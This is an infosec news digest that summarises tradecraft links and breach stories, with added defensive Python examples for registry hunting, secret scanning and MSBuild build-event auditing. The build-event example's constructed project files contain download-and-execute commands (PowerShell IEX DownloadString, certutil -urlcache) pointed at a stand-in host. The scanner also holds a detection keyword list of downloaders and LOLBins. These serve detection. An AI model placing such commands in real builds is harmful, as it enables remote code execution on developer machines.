HAQ.NEWS

// Jared Folkins

# Description

The Windows Incident Response blog entry reviews the r77 rootkit, stressing that threat hunters must distinguish registry keys from registry values when searching for its indirect artifacts. swaggerHole, a Python3 script, automates the search for secrets in public SwaggerHub APIs using multithreading and optional JSON output. UAC-BOF-Bonanza is a GitHub repository collecting UAC bypass methods as Beacon Object Files (BOFs) for the Havoc C2 framework and Sliver. An article demonstrates abusing the Visual Studio pre-build event to execute malicious commands, gaining system access and elevating privileges on a Windows server. Another article outlines implementing process hollowing on Windows, refining the traditional code injection technique. A guide explains reverse engineering a FOSCAM camera's firmware, dumped with an SPI flash programmer and analyzed in Ghidra, to recover the key that decrypts the firmware image. Techniques to analyze and deobfuscate VMProtect- and Alcatraz-protected binaries are shared. Brett Buerhaus detailed an XSS exploit chain built on DOM clobbering. SpawnWith is a BOF for process spawning and shellcode injection. Minder by Stacklok provides software supply chain security features such as policy management and artifact attestation. HLR lookup services by ООО «СМС-центр» provide carrier and status information about mobile phone numbers sourced from third-party operators. FileSearch.link is a service for finding files across upload sites. Various file-sharing and cloud storage websites are listed for data exchange research. A PDF with a Geolocation Analysis Diagram from the 'osint' repository assists in intelligence work. A GitHub repository hosts an open-source LTE sniffer tool for eavesdropping on LTE communication, which must be used in compliance with local law. Geo-Recon is an OSINT tool for IP geolocation and reputation checks with optional Nmap support. IP-Tracer is a command-line tool for tracking IP addresses on Linux and Termux, using ip-api to retrieve the information.

A Russian national is on trial for a cyberattack on a power grid that led to a blackout in 38 villages. North Korean hackers infiltrated the Russian Ministry of Foreign Affairs using KONNI malware. Sony's Insomniac Games alerts employees to a data breach by the Rhysida ransomware group. The FTC sues H&R Block for deceptive "free" online filing ads. LAX airport's database was compromised by IntelBroker, exposing 2.5 million records. The LockBit ransomware group has extorted over a billion dollars, and authorities have now disrupted its operations. Microsoft releases PyRIT for security testing of generative AI systems. Australian telecom Tangerine discloses a breach affecting 230,000 users. New Jersey rehab centers operated by Maryville fell victim to a cyberattack, and Mr. Cooper exposed two million customer records. Google Pay is set to end peer-to-peer payments in the US, while U-Haul confirms a breach affecting 67,000 customers. Apple fixes a vulnerability in its Shortcuts app. Avast settles with the FTC for $16.5 million over data privacy violations. The U.S. military assesses a high-altitude balloon over Utah. Google pauses Gemini AI's person generation over errors. The blockchain space continues to see security breaches and unethical practices, and GitHub hosts OSINT-Practitioners, a resource hub for open-source intelligence enthusiasts.

# Tradecraft

[#] The recent Windows Incident Response blog entry examines the r77 rootkit, emphasizing that threat hunters must distinguish registry keys from registry values when looking for the rootkit's indirect artifacts.
Read More @ blogspot.com
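The key-versus-value distinction matters in practice because a hunt query that only enumerates keys misses artifacts stored as value names, and vice versa. The added example below (not code from the blog post) parses a Windows registry export (.reg) into separate key and value records, then flags entries whose names carry a given prefix. The default prefix `$77` is r77's documented convention for the entries it hides and is assumed here, not taken from the page; the sample export and its paths are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample of a .reg export. Paths and names are made up; the
# "$77" entries stand in for the naming convention r77 is documented to use.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Contoso\Agent]
"InstallPath"="C:\\Program Files\\Contoso\\agent.exe"
"Version"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\$77config\pid]
"$77svc"=dword:00001a2c

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"$77updater"="C:\\Users\\Public\\upd.exe"
"OneDrive"="C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"
"""


@dataclass
class RegValue:
    key: str    # full path of the key that holds the value
    name: str   # value name; "" for the default value written as @
    vtype: str  # REG_SZ, REG_DWORD, REG_BINARY or UNKNOWN
    data: str   # decoded data (decimal string for DWORD)


KEY_RE = re.compile(r"^\[(-?)(.+)\]$")
VALUE_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def parse_reg(text: str) -> Tuple[List[str], List[RegValue]]:
    """Split a .reg export into key paths and the values stored under them."""
    keys: List[str] = []
    values: List[RegValue] = []
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group(2)   # a "[-...]" line would delete the key; we still record it
            keys.append(current)
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name = m.group(1) if m.group(1) is not None else ""
            rhs = m.group(2)
            if rhs.startswith('"'):
                vtype, data = "REG_SZ", rhs[1:-1].replace("\\\\", "\\")
            elif rhs.startswith("dword:"):
                vtype, data = "REG_DWORD", str(int(rhs[len("dword:"):], 16))
            elif rhs.startswith("hex"):
                vtype, data = "REG_BINARY", rhs
            else:
                vtype, data = "UNKNOWN", rhs
            values.append(RegValue(current, name, vtype, data))
    return keys, values


def find_prefixed(keys: List[str], values: List[RegValue],
                  prefix: str = "$77") -> Tuple[List[str], List[RegValue]]:
    """Return keys whose path contains a component with the prefix, and values
    whose *name* starts with it. Both lists are needed: a key-only walk would
    miss "$77updater" under Run, a value-only walk would miss "$77config"."""
    hidden_keys = [k for k in keys if any(p.startswith(prefix) for p in k.split("\\"))]
    hidden_values = [v for v in values if v.name.startswith(prefix)]
    return hidden_keys, hidden_values


if __name__ == "__main__":
    ks, vs = parse_reg(SAMPLE_REG)
    hk, hv = find_prefixed(ks, vs)
    for k in hk:
        print("key   :", k)
    for v in hv:
        print("value :", v.key, "->", v.name, v.vtype, v.data)
```

Run it against a real export taken with `reg export` from a context the rootkit does not hook (a remote query or an offline hive) rather than from a process on the infected host, since r77 hides the prefixed entries from hooked enumeration calls.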
[#] The swaggerHole Python3 script automates the discovery of secrets leaked in public API definitions listed on SwaggerHub, using multithreading for speed and offering optional JSON output.
Read More @ kitploit.com
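The core of a tool like this is a regex sweep over every string in each API definition, fanned out over a thread pool. The added example below is not swaggerHole's code: it walks parsed OpenAPI/Swagger JSON documents, applies a small set of secret-shaped patterns (the AWS access key ID and JWT shapes are well known; the rest are generic heuristics), and scans several documents concurrently. The three sample definitions are constructed inline so the example runs offline; a real tool would fetch them from the SwaggerHub API instead.

```python
import json
import re
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, Iterable, List, Tuple

# Secret-shaped patterns. Order matters only for the order of reported hits.
SECRET_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\b"),
    "bearer_token": re.compile(r"(?i)bearer\s+[A-Za-z0-9._\-]{20,}"),
    "generic_api_key": re.compile(
        r'(?i)\b(?:api[_-]?key|secret|password|token)\b["\']?\s*[:=]\s*["\']?([A-Za-z0-9_\-]{16,})'
    ),
}

# Constructed sample API definitions (not real SwaggerHub content).
# AKIAIOSFODNN7EXAMPLE is AWS's own documentation example key.
SAMPLE_APIS: Dict[str, dict] = {
    "acme/billing/1.0": {
        "openapi": "3.0.0",
        "info": {"title": "Billing", "description": "Internal notes: api_key = ZkP3l9QmXvT7bN2cR8sW"},
        "servers": [{"url": "https://api.example.test"}],
        "paths": {"/invoices": {"get": {"parameters": [{
            "name": "Authorization",
            "example": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiJ9.Xy4z8KfQ9LmN0pR2sT6uV1wB3cD5eF7gH8iJ",
        }]}}},
    },
    "acme/storage/2.1": {
        "openapi": "3.0.0",
        "info": {"title": "Storage"},
        "components": {"examples": {"creds": {"value": {"accessKeyId": "AKIAIOSFODNN7EXAMPLE"}}}},
    },
    "acme/clean/1.0": {"openapi": "3.0.0", "info": {"title": "Nothing to see"}},
}


def walk_strings(node, path: str = "$") -> Iterable[Tuple[str, str]]:
    """Yield (json_path, string) for every string leaf in a parsed JSON document."""
    if isinstance(node, dict):
        for k, v in node.items():
            yield from walk_strings(v, f"{path}.{k}")
    elif isinstance(node, list):
        for i, v in enumerate(node):
            yield from walk_strings(v, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node


def scan_document(name: str, doc: dict) -> List[dict]:
    """Apply every pattern to every string in one API definition."""
    hits: List[dict] = []
    for path, text in walk_strings(doc):
        for label, pattern in SECRET_PATTERNS.items():
            for m in pattern.finditer(text):
                hits.append({"api": name, "path": path, "type": label, "match": m.group(0)})
    return hits


def scan_many(docs: Dict[str, dict], workers: int = 8) -> List[dict]:
    """Scan documents concurrently; results keep the input order."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        per_doc = pool.map(lambda item: scan_document(*item), docs.items())
    return [h for hits in per_doc for h in hits]


def to_json(hits: List[dict]) -> str:
    return json.dumps(hits, indent=2)


if __name__ == "__main__":
    print(to_json(scan_many(SAMPLE_APIS)))
```

Expect overlapping hits on the same string (a bearer header carrying a JWT matches both the `bearer_token` and `jwt` patterns); de-duplicate by path if that is noise for your workflow, and treat every hit as a lead to verify, not a confirmed live credential.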
[#] A GitHub repository named UAC-BOF-Bonanza collects various UAC bypass methods implemented as Beacon Object Files (BOFs) for the Havoc C2 framework and Sliver, useful for penetration testers who need to get past User Account Control (UAC) on Windows systems.
Read More @ securityonline.info
[#] The article demonstrates an exploitation method in which a Visual Studio build is abused to run a pre-build event command from a malicious Gitea-hosted project, yielding a foothold on a Windows server via a PHP webshell and privilege escalation with the FullPowers and GodPotato tools.
Read More @ gitlab.io
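Build events are ordinary MSBuild targets, so anyone who can get a project file opened and built can run a command as the building user. The defensive counterpart to the article is to enumerate those commands before building an untrusted project. The added example below (not code from the article) parses SDK-style .csproj files and namespaced .vcxproj files with the standard library, reports every `Exec` task and `PreBuildEvent`/`PostBuildEvent` command, and flags those that invoke an interpreter or downloader. The two sample project files and their commands are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List

EVENT_TAGS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent"}
# Lower-cased tokens that usually mean a build event is doing more than compiling.
SUSPICIOUS = ("powershell", "pwsh", "cmd.exe", "cmd /c", "certutil", "bitsadmin",
              "mshta", "rundll32", "regsvr32", "curl ", "wget ", "http://", "https://")

# Constructed SDK-style project: a pre-build target that downloads and runs a script.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
  </PropertyGroup>
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="powershell -nop -w hidden -c &quot;IEX (New-Object Net.WebClient).DownloadString('http://build.example/setup.ps1')&quot;" />
  </Target>
  <Target Name="Stamp" AfterTargets="Build">
    <Exec Command="echo build $(Configuration) done" />
  </Target>
</Project>
"""

# Constructed legacy C++ project using the 2003 MSBuild namespace.
SAMPLE_VCXPROJ = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup>
    <PreBuildEvent>
      <Command>cmd.exe /c certutil -urlcache -split -f http://build.example/helper.exe helper.exe</Command>
    </PreBuildEvent>
    <PostBuildEvent>
      <Command>copy "$(TargetPath)" "$(SolutionDir)bin\\"</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
</Project>
"""


def local(tag: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def is_suspicious(command: str) -> bool:
    c = command.lower()
    return any(tok in c for tok in SUSPICIOUS)


def find_build_commands(project_xml: str) -> List[Dict[str, object]]:
    """Return every command MSBuild would run for this project, in document order."""
    root = ET.fromstring(project_xml)
    parents = {child: p for p in root.iter() for child in p}
    found: List[Dict[str, object]] = []
    for el in root.iter():
        name = local(el.tag)
        if name in EVENT_TAGS:
            # .vcxproj nests a <Command> child; old-style .csproj holds the text directly.
            cmd_el = next((c for c in el if local(c.tag) == "Command"), None)
            cmd = (cmd_el.text if cmd_el is not None else el.text) or ""
            if cmd.strip():
                found.append({"source": name, "target": "", "hook": name,
                              "command": cmd.strip(), "suspicious": is_suspicious(cmd)})
        elif name == "Exec":
            cmd = el.get("Command", "")
            t = parents.get(el)
            while t is not None and local(t.tag) != "Target":
                t = parents.get(t)
            target = t.get("Name", "") if t is not None else ""
            hook = (t.get("BeforeTargets") or t.get("AfterTargets") or "") if t is not None else ""
            found.append({"source": "Exec", "target": target, "hook": hook,
                          "command": cmd, "suspicious": is_suspicious(cmd)})
    return found


if __name__ == "__main__":
    for label, xml in (("csproj", SAMPLE_CSPROJ), ("vcxproj", SAMPLE_VCXPROJ)):
        for entry in find_build_commands(xml):
            flag = "!!" if entry["suspicious"] else "  "
            print(f"{flag} {label} {entry['source']}/{entry['target']} [{entry['hook']}]: {entry['command']}")
```

A clean report is not proof of safety: Directory.Build.props, imported .targets files, NuGet package build scripts and custom tasks can all run code too, so in a build pipeline run this over every MSBuild file the project imports, and build untrusted projects only in a disposable VM.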
[#] The article provides a detailed guide on implementing process hollowing on Windows, a code injection technique, with additional steps for handling the import table and resolving dependencies inside the remote process without unmapping the primary image, aiming to improve upon the traditional method.
Read More @ github.io
[#] A detailed walkthrough on reverse engineering a FOSCAM camera's firmware to extract its encryption key: the flash is dumped with an SPI flash programmer, the code is analyzed in Ghidra, and the recovered key is then used to decrypt the firmware binary.
Read More @ hacked.codes
[#] The article details techniques for analyzing and deobfuscating binaries protected by the VMProtect and Alcatraz obfuscators, including manual reverse engineering and writing the corrected opcodes into a new section of the binary for analysis.
Read More @ keowu.re
[#] Security researcher Brett Buerhaus detailed a Cross-Site Scripting exploit chain built on DOM clobbering against a site without a restrictive Content Security Policy, showing how the technique can compromise an otherwise well-defended domain.
Read More @ buer.haus
[#] SpawnWith is an experimental Beacon Object File (BOF) that spawns a process and injects shellcode into it using a duplicated token, extending what the standard spawnas and inject commands offer.
Read More @ github.com
[#] Minder by Stacklok is a software supply chain security platform offering policy management, security checks, artifact attestation, and dependency management to ensure development teams create secure software.
Read More @ securityonline.info
[#] The text discusses HLR (Home Location Register) lookup services which allow individuals to query mobile phone numbers to discover the associated carrier, subscriber status, and other details, offered by ООО «СМС-центр» for testing and verification purposes, noting that the accuracy is not guaranteed as the data is provided by third-party mobile operators.
Read More @ smsc.ru
[#] FileSearch.link is a search service leveraging Google's infrastructure that allows users to find content across various file upload sites, offering sorting by relevance or date and the option to purchase premium accounts for faster downloads.
Read More @ filesearch.link
[#] The text lists various file-sharing and cloud storage websites that can be searched for shared data, useful to forensic analysts and penetration testers tracing where leaked or exfiltrated files may have been posted.
Read More @ searchshared.info
[#] The PDF file from the 'osint' repository contains a version 1.2 update of a Geolocation Analysis Diagram that provides visual clues for conducting geolocation analysis in open source intelligence work.
Read More @ github.com
[#] The SysSec-KAIST/LTESniffer repository on GitHub describes an open-source tool for eavesdropping on LTE uplink and downlink traffic, which requires software-defined radio hardware and must be used in compliance with local regulations.
Read More @ github.com
[#] Geo-Recon is an OSINT command-line tool for quickly obtaining the geolocation and reputation of an IP address, with optional Nmap support for follow-up scanning.
Read More @ github.com
[#] IP-Tracer is a command-line tool for looking up IP addresses on Linux and Termux; it relies on ip-api for the location data and is installed with a short series of shell commands.
Read More @ github.com

# News

[#] A Russian national faces trial for executing a cyberattack on a power grid in the Vologda region, leading to a blackout across 38 villages, and if convicted, could serve up to eight years in prison.
Read More @ securityaffairs.com
[#] North Korean hackers have used KONNI malware to backdoor software at the Russian Ministry of Foreign Affairs, which allows the execution of commands and stealing of data via an encrypted connection.
Read More @ hackread.com
[#] Sony's game development studio, Insomniac Games, is notifying employees of a data breach by the Rhysida ransomware group, providing additional credit monitoring services, and actively responding to inquiries regarding the November attack.
Read More @ bleepingcomputer.com
[#] The FTC is suing H&R Block for deceptively advertising free online filing services which often lead to users being charged for more expensive tax products they may not need.
Read More @ bleepingcomputer.com
[#] The Los Angeles International Airport database was compromised by hacker IntelBroker, exposing 2.5 million records of private plane owners including full names, CPA numbers, 1.9 million email addresses, company names, plane model numbers, and tail numbers, due to a CRM system vulnerability.
Read More @ hackread.com
[#] The LockBit ransomware group has extorted over a billion dollars from victims during its four-year run, a figure revealed by the financial investigation accompanying the law-enforcement operation that disrupted its infrastructure and seized its assets.
Read More @ theregister.com
[#] Microsoft has released PyRIT, an automation framework for red teaming generative AI systems, enabling security professionals to proactively identify risks by simulating realistic adversarial behaviors against AI implementations.
Read More @ securityaffairs.com
[#] Australian telecommunications provider Tangerine disclosed a data breach affecting approximately 230,000 individuals, revealing personal details excluding financial information, and has taken steps such as multi-factor authentication to enhance account security.
Read More @ securityaffairs.com
[#] Several rehabilitation centers in New Jersey, operated by Maryville, were compromised in a cyberattack, with attackers accessing sensitive data through a corporate email account, and in response, Maryville is enhancing its security measures and offering affected individuals credit monitoring services.
Read More @ scmagazine.com
[#] Over two million customer records from Mr. Cooper mortgage firm were exposed due to an insecurely configured Google Cloud storage bucket, revealing names, phone numbers, and emails, necessitating stricter security controls and incident response protocols.
Read More @ scmagazine.com
[#] Google Pay will discontinue its peer-to-peer payment services in the US on June 4, 2024, urging users to migrate to Google Wallet and assuring continued support for other features until the shutdown date.
Read More @ bleepingcomputer.com
[#] U-Haul confirmed a data breach affecting about 67,000 customers from the USA and Canada, due to an unauthorized intrusion by attackers using stolen credentials on December 5; no payment information was taken, and improved security measures like password changes and Experian IdentityWorks Credit 3B memberships have been implemented.
Read More @ packetstormsecurity.com
[#] A high-severity vulnerability in Apple's Shortcuts app, tracked as CVE-2024-23204, which could let a malicious shortcut access sensitive data without user consent, has been fixed in the latest iOS, iPadOS, and macOS updates.
Read More @ packetstormsecurity.com
[#] Avast, known for its antivirus and privacy tools, collected and sold users' browsing data through its subsidiary Jumpshot from 2014 to 2020, leading to a $16.5 million FTC settlement and the requirement for Avast to establish a comprehensive privacy program and obtain explicit user consent for data collection.
Read More @ packetstormsecurity.com
[#] The U.S. military tracked and assessed a high-altitude balloon over Utah, which NORAD judged non-threatening and non-maneuverable; the balloon, apparently made of Mylar with an attached box, was drifting east toward Georgia, with its origin and purpose unclear.
Read More @ packetstormsecurity.com
[#] Google has temporarily halted its Gemini AI's person generation feature after it incorrectly produced diverse historical figures, and the company is working on improving the system to address these issues.
Read More @ engadget.com
[#] A series of security breaches and unethical practices have affected the blockchain space recently, including wallet compromises in Axie Infinity and Beam, token pump-and-dump schemes from influencers and an NFT project, laundering of stolen funds from the AAX exchange and FixedFloat platform, insider trading allegations in the NFT market, and governance issues on the Farcaster social network platform.
Read More @ web3isgoinggreat.com
[#] GitHub houses a repository named OSINT-Practitioners, offering a collection of links to various tools, techniques, and resources provided by notable personalities in the open-source intelligence community, covering specialties such as geolocation, social media investigation, and the development of OSINT tools, accessible for both free and paid services.
Read More @ github.com

# F.A.Q

Problem

Many websites are using AI/ML to create clickbait which actually doesn't have any valuable content.

Value

I use AI to de-clickbait the clickbait by allowing AI to read my news for me. Then it creates a meaningful tl;dr regarding the articles of interest, which helps me discern what I should read. It is saving me a ton of time.

Why

FWIW HAQ.NEWS really started out as my personal news feed, enriched by AI, and converted into something quick and easy to read. But then I started getting requests for features like RSS, Gracie got involved, and with the super-power of AI things have taken on a life of their own.

Sharing

I currently post daily infosec news to X, LinkedIn, Mastodon and RSS.

I also post daily infosec podcasts and interviews to Apple Podcasts and Spotify.

Ads

This isn't an Ad.

current friend of haq 2024-02-25

I want to encourage people and projects that impress me, by posting a banner linking their work, as it's my desire to help others. I do not take or make any money.

Thanks,
Jared Folkins